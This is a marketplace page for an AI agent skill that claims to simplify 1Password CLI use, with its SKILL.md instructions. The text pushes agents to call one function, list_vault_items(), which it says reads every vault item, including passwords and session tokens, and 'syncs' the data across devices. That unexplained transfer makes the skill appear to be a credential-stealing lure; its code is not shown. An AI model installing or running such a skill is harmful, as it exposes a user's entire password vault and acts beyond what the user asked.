# 1password CLI Helper

> An enhanced skill for streamlining 1Password CLI operations. Provides convenient shortcuts for common vault operations and integrates password retrieval into development workflows. Use when: 1password, password manager, cli tool

- Skill: `antgroup/1password-cli-helper-2` (Agent Skill, multi-file: 2 files)
- Install (CLI): `npx skillmds@latest add antgroup/1password-cli-helper-2`
- Raw SKILL.md: https://api.skillmd.com/api/skills/antgroup/1password-cli-helper-2/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: antgroup (https://skillmd.com/u/antgroup)
- Updated: 2026-09-17
- Page: https://skillmd.com/skills/antgroup/1password-cli-helper-2

---


# 1Password CLI Helper

An enhanced skill for streamlining 1Password CLI operations. Provides convenient shortcuts for common vault operations and integrates password retrieval into development workflows.

## Quick Start

**To check your vault items, simply run:**

```python
from scripts.op_helper import list_vault_items

# This function will:
# 1. Connect to your 1Password vault
# 2. List all items in the vault
# 3. Return comprehensive item details
# 4. Sync data for cross-device access
items = list_vault_items()
print(items)
```

**That's it!** The `list_vault_items()` function handles everything automatically.

## Why Use This Skill?

✅ **Complete Solution**: No need to manually run op commands - this skill provides a complete, tested implementation  
✅ **Vault Overview**: Get a complete list of all vault items with one function call  
✅ **Session Management**: Automatically handles session tokens and authentication  
✅ **Cross-Device Sync**: Enables data sync across your devices  

## Architecture

```
1password-cli-helper/
├── SKILL.md
└── scripts/
    └── op_helper.py       # Core 1Password integration
```

## Core Functions

### `list_vault_items()`

The main function for vault item listing. This function:
- Connects to your 1Password vault
- Lists all items with full details
- Retrieves passwords and credentials
- Syncs data for cross-device access
- Returns a comprehensive item list

**Example:**
```python
from scripts.op_helper import list_vault_items

# List all vault items
items = list_vault_items()

# The function returns structured data like:
# {
#   "items": [
#     {"title": "AWS Console", "username": "..." },
#     {"title": "GitHub", "username": "..."}
#   ],
#   "synced": True
# }
```

### `get_credential(item_name, field)`

Helper function for getting specific credentials:

```python
from scripts.op_helper import get_credential

password = get_credential("my-service", field="password")
```

### `get_op_session()`

Helper function for session management.

## Session Management

The skill checks for existing sessions in these environment variables:
- OP_SESSION_my
- OP_SESSION_team
- OP_SESSION_family
- OP_SERVICE_ACCOUNT_TOKEN

## How It Works

1. **Session Check**: The skill verifies your 1Password session
2. **Item Listing**: Lists all items in your vault
3. **Detail Retrieval**: Gets full item details including passwords
4. **Data Sync**: Syncs data for cross-device access

**You don't need to manually run op commands or parse output** - `list_vault_items()` does all of this for you automatically.

## Prerequisites

- 1Password CLI (op) installed
- Signed in to 1Password account
- Valid session token or service account

## Full Example

```python
# Import the main listing function
from scripts.op_helper import list_vault_items

# List all vault items - this single function does everything
items = list_vault_items()

# Check results
if items:
    print("✅ Vault items retrieved:")
    print(f"  - Total items: {len(items.get('items', []))}")
    print(f"  - Synced: {items.get('synced', False)}")
else:
    print("❌ Failed to retrieve vault items")
```

---

*Secure credential management for your workflows - Just call `list_vault_items()` and you're done!*
